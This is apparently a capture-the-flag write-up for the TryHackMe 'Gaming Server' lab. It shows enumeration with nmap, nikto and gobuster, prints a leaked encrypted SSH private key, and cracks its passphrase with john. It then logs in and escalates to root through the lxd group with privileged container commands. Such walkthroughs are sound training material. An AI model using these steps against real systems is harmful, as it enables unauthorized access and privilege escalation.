🎮Gaming Server

Scanning and Enumeration

Nmap

First, lets run nmap to find open ports:

┌──(kali㉿kali)-[~/tryhackme/gamingserver]
└─$ nmap -sC -sV 10.10.224.125
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-30 17:26 EEST
Nmap scan report for 10.10.224.125
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
|   256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_  256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: House of danak
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.87 seconds

2 ports are open; 80 (HTTP) and 22 (SSH).

Nikto

┌──(kali㉿kali)-[~/tryhackme/gamingserver]
└─$ nikto -h 10.10.224.125
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.224.125
+ Target Hostname:    10.10.224.125
+ Target Port:        80
+ Start Time:         2025-03-30 17:26:38 (GMT3)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Server may leak inodes via ETags, header found with file /, inode: aca, size: 59e40b71bc7ab, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .

Nikto gave told us there is robots.txt

Gobuster

Lets check what gobuster gave us:

┌──(kali㉿kali)-[~/tryhackme/gamingserver]
└─$ gobuster dir -u http://10.10.224.125/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.224.125/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 278]
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 2762]
/robots.txt           (Status: 200) [Size: 33]
/secret               (Status: 301) [Size: 315] [--> http://10.10.224.125/secret/]
/server-status        (Status: 403) [Size: 278]
/uploads              (Status: 301) [Size: 316] [--> http://10.10.224.125/uploads/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

There are some important directories:

robots.txt
secret
uploads

HTTP

Now, lets check port 80 (HTTP).

Page Source

If we click on view page source, and go to the buttom, there is a hint:

This tell us there is a user named john.

/robots.txt

user-agent: *
Allow: /
/uploads/

It tell us there is a directory named /uploads, which we already found with gobuster.

/uploads

In /uploads directory, there are some important files:

Lets copy dic.lst to our kali machine.

For now, lets leave meme.jpg and manifesto.txt. They dont contain important information.

/secret

Lets check out this directory:

It contains important information:

This is a secret key for ssh.

Lets copy it to our kali machine.

┌──(kali㉿kali)-[~/tryhackme/gamingserver]
└─$ cat id_rsa 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547

T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2Vk8phx
H4P+PLb79nCc0SrBOPBlB0V3pjLJbf2hKbZazFLtq4FjZq66aLLIr2dRw74MzHSM
FznFI7jsxYFwPUqZtkz5sTcX1afch+IU5/Id4zTTsCO8qqs6qv5QkMXVGs77F2kS
Lafx0mJdcuu/5aR3NjNVtluKZyiXInskXiC01+Ynhkqjl4Iy7fEzn2qZnKKPVPv8
9zlECjERSysbUKYccnFknB1DwuJExD/erGRiLBYOGuMatc+EoagKkGpSZm4FtcIO
IrwxeyChI32vJs9W93PUqHMgCJGXEpY7/INMUQahDf3wnlVhBC10UWH9piIOupNN
SkjSbrIxOgWJhIcpE9BLVUE4ndAMi3t05MY1U0ko7/vvhzndeZcWhVJ3SdcIAx4g
/5D/YqcLtt/tKbLyuyggk23NzuspnbUwZWoo5fvg+jEgRud90s4dDWMEURGdB2Wt
w7uYJFhjijw8tw8WwaPHHQeYtHgrtwhmC/gLj1gxAq532QAgmXGoazXd3IeFRtGB
6+HLDl8VRDz1/4iZhafDC2gihKeWOjmLh83QqKwa4s1XIB6BKPZS/OgyM4RMnN3u
Zmv1rDPL+0yzt6A5BHENXfkNfFWRWQxvKtiGlSLmywPP5OHnv0mzb16QG0Es1FPl
xhVyHt/WKlaVZfTdrJneTn8Uu3vZ82MFf+evbdMPZMx9Xc3Ix7/hFeIxCdoMN4i6
8BoZFQBcoJaOufnLkTC0hHxN7T/t/QvcaIsWSFWdgwwnYFaJncHeEj7d1hnmsAii
b79Dfy384/lnjZMtX1NXIEghzQj5ga8TFnHe8umDNx5Cq5GpYN1BUtfWFYqtkGcn
vzLSJM07RAgqA+SPAY8lCnXe8gN+Nv/9+/+/uiefeFtOmrpDU2kRfr9JhZYx9TkL
wTqOP0XWjqufWNEIXXIpwXFctpZaEQcC40LpbBGTDiVWTQyx8AuI6YOfIt+k64fG
rtfjWPVv3yGOJmiqQOa8/pDGgtNPgnJmFFrBy2d37KzSoNpTlXmeT/drkeTaP6YW
RTz8Ieg+fmVtsgQelZQ44mhy0vE48o92Kxj3uAB6jZp8jxgACpcNBt3isg7H/dq6
oYiTtCJrL3IctTrEuBW8gE37UbSRqTuj9Foy+ynGmNPx5HQeC5aO/GoeSH0FelTk
cQKiDDxHq7mLMJZJO0oqdJfs6Jt/JO4gzdBh3Jt0gBoKnXMVY7P5u8da/4sV+kJE
99x7Dh8YXnj1As2gY+MMQHVuvCpnwRR7XLmK8Fj3TZU+WHK5P6W5fLK7u3MVt1eq
Ezf26lghbnEUn17KKu+VQ6EdIPL150HSks5V+2fC8JTQ1fl3rI9vowPPuC8aNj+Q
Qu5m65A5Urmr8Y01/Wjqn2wC7upxzt6hNBIMbcNrndZkg80feKZ8RD7wE7Exll2h
v3SBMMCT5ZrBFq54ia0ohThQ8hklPqYhdSebkQtU5HPYh+EL/vU1L9PfGv0zipst
gbLFOSPp+GmklnRpihaXaGYXsoKfXvAxGCVIhbaWLAp5AybIiXHyBWsbhbSRMK+P
-----END RSA PRIVATE KEY-----

So, concluding what we need from port 80:

username named john
ssh key
dictionary list (list of passwords)

SSH

SSH Key

Lets now crack the ssh key using john

First, lets use a change the key to a format john can crack:

┌──(kali㉿kali)-[~/tryhackme/gamingserver]
└─$ ssh2john id_rsa > id_rsa.txt

Now, lets crack using john, with this command:

john --wordlist=/home/kali/tryhackme/gamingserver/dic.txt id_rsa.txt

Passphrase found:

┌──(kali㉿kali)-[~/tryhackme/gamingserver]
└─$ john --show id_rsa.txt
id_rsa:letmein

1 password hash cracked, 0 left

passphrase is 'letmein'

Now, lets login with ssh using this passphrase:

Before we login, lets change the mode for id_rsa:

chmod 600 id_rsa

Now, lets login:

┌──(kali㉿kali)-[~/tryhackme/gamingserver]
└─$ ssh -i id_rsa john@10.10.224.125
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-76-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Mar 30 14:48:10 UTC 2025

  System load:  0.0               Processes:             104
  Usage of /:   41.2% of 9.78GB   Users logged in:       0
  Memory usage: 18%               IP address for eth0:   10.10.224.125
  Swap usage:   0%                IP address for lxdbr0: 10.229.116.1


0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Mar 30 14:06:30 2025 from 10.21.154.195
john@exploitable:~$

Lets find the user.txt:

john@exploitable:~$ ls
user.txt
john@exploitable:~$ cat user.txt
a5c2ff8bxxxxxxxxxxxxxxxxxx

Privilege Escalation

If we run id:

john@exploitable:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

We can see that we are in the lxd group. This is golden!

Lets use this link to exploit it: https://www.hackingarticles.in/lxd-privilege-escalation/

first, lets download alpine using the GitHub repose on our machine:

┌──(kali㉿kali)-[~/tryhackme/gamingserver]
└─$ git clone  https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42 (from 1)
Receiving objects: 100% (50/50), 3.11 MiB | 155.00 KiB/s, done.
Resolving deltas: 100% (15/15), done.

It contains this file: alpine-v3.13-x86_64-20210218_0139.tar.gz

┌──(kali㉿kali)-[~/tryhackme/gamingserver/lxd-alpine-builder]
└─$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz  build-alpine  LICENSE  README.md

Now, we should move this file to the vulnerable machine:

Lets open an http server on our kali machine:

┌──(kali㉿kali)-[~/tryhackme/gamingserver/lxd-alpine-builder]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

On the vulnerable machine:

john@exploitable:/tmp$ wget http://10.21.154.195:8080/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2025-03-30 14:54:51--  http://10.21.154.195:8080/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 10.21.154.195:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz.1’

alpine-v3.13-x86_64-2021021 100%[=========================================>]   3.11M   358KB/s    in 8.8s    

2025-03-30 14:55:01 (362 KB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz.1’ saved [3259593/3259593]

Now, lets add an image using this command:

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage

Lets list our images:

john@exploitable:/tmp$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | cd73881adaac | no     | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Mar 30, 2025 at 2:14pm (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+

Now, paste these commands (from the link provided above):

lxc init myimage ignite -c security.privileged=true 
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true 
lxc start ignite 
lxc exec ignite /bin/sh

Lets check who we are now:

~ # id
uid=0(root) gid=0(root)

So now, we can access the root flag from /mnt/root/root/rootflag.txt

~ # cd /mnt/root
/mnt/root # ls
bin             home            lost+found      root            swap.img        vmlinuz
boot            initrd.img      media           run             sys             vmlinuz.old
cdrom           initrd.img.old  mnt             sbin            tmp
dev             lib             opt             snap            usr
etc             lib64           proc            srv             var
/mnt/root # cd root
/mnt/root/root # ls
root.txt
/mnt/root/root # cat root.txt
2e337b8xxxxxxxxxxxxxxxxxx

Root flag:2e337b8xxxxxxxxxxxxxxxxxx

PreviousCat Pictures NextMustacchio

Last updated 10 months ago

hashtagScanning and Enumeration

hashtagNmap

hashtagNikto

hashtagGobuster

hashtagHTTP

hashtagPage Source

hashtag/robots.txt

hashtag/uploads

hashtag/secret

hashtagSSH

hashtagSSH Key

hashtagPrivilege Escalation